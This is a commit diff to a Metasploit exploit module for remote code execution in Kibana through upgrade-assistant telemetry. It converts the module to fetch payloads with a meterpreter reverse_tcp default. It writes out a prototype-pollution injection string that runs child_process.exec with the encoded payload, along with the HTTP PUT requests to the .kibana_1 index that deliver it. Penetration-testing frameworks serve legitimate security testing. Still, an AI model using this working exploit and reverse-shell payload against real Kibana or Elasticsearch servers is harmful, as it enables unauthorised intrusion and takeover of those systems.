convert cmd_stager to fetch payloads

rapid7 · Oct 6, 2023 · a2a9bec · a2a9bec
1 parent 5e0538a
commit a2a9bec
Showing 1 changed file with 14 additions and 12 deletions.
diff --git a/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb b/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking # causes service to not respond until cleanup and reboot
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
   # decided not to use autocheck since it doesn't work for both targets
 
   def initialize(info = {})
@@ -35,16 +34,18 @@ def initialize(info = {})
         'References' => [
           [ 'URL', 'https://hackerone.com/reports/852613'],
         ],
-        'Platform' => ['linux'],
         'Privileged' => false,
-        'Arch' => ARCH_X64,
+        'Arch' => [ ARCH_CMD ],
+        'Platform' => [ 'linux' ],
+        'Type' => :nix_cmd,
         'DefaultOptions' => {
-          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          # 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
           'WfsDelay' => 1800 # 30min
         },
         'Targets' => [
-          [ 'ELASTIC', { 'CmdStagerFlavor' => [ 'curl' ] } ], # target kibana through a direct elastic connection
-          [ 'KIBANA', { 'CmdStagerFlavor' => [ 'curl' ] } ] # target kibana through the dev console to implant elastic data
+          [ 'ELASTIC', {}], # target kibana through a direct elastic connection
+          [ 'KIBANA', {}] # target kibana through the dev console to implant elastic data
         ],
         'DisclosureDate' => '2020-04-17',
         'DefaultTarget' => 0,
@@ -69,7 +70,7 @@ def initialize(info = {})
   # https://stackoverflow.com/a/4899857
   def time_rand(from = Time.local(2020, 6, 28), to = Time.now)
     Time.at(from + rand * (to.to_f - from.to_f)).strftime('%FT%T.000Z')
-    # outputs 2010-06-28 06:44:27 0200  format, we need 2020-04-17T20:47:40.800Z
+    # outputs 2020-04-17T20:47:40.800Z format
   end
 
   # This is how it should be done, but it will crash the session. Leaving here in case someone figures out how to not crash the session
@@ -103,14 +104,14 @@ def elastic_cleanup
     fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
   end
 
-  def execute_command(cmd, _opts = {})
+  def execute_command
     case target.name
     when 'ELASTIC'
       request = {
         'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'),
         'method' => 'PUT',
         'ctype' => 'application/json',
-        'data' => telemetry_data.to_json.sub('PAYLOADHERE', cmd)
+        'data' => telemetry_data.to_json
       }
       request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?
 
@@ -127,7 +128,7 @@ def execute_command(cmd, _opts = {})
           'path' => '.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry', # URI for the elastic request
           'method' => 'PUT' # method for the elastic query
         },
-        'data' => telemetry_data.to_json.sub('PAYLOADHERE', cmd)
+        'data' => telemetry_data.to_json
       )
     end
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
@@ -140,7 +141,7 @@ def telemetry_data
         'ui_open.overview' => 1,
         'ui_open.cluster' => 1,
         'ui_open.indices' => 1,
-        'constructor.prototype.sourceURL' => "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('PAYLOADHERE')"
+        'constructor.prototype.sourceURL' => "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('#{payload.encoded}')"
       },
       'type' => 'upgrade-assistant-telemetry',
       'updated_at' => time_rand
@@ -344,14 +345,15 @@ def exploit
     when 'KIBANA'
       print_warning('RPORT should most likely be set to 5601 when exploiting the KIBANA target') if datastore['RPORT'] != 5601
       # xsrf for unlicensed kibana seems to just be kibana... at least for 7.6.2
+      # https://discuss.elastic.co/t/where-can-i-get-the-correct-kbn-xsrf-value-for-my-plugin-http-requests/158725/3
       @xsrf = 'kibana'
       print_status('Creating index')
       kibana_create_index
       print_status('Sending index map')
       kibana_send_mapping
     end
     print_status('Sending telemetry data with payload')
-    execute_cmdstager
+    execute_command
     print_status("Waiting #{datastore['WfsDelay']} seconds for shell (kibana restart/cleanup)")
   end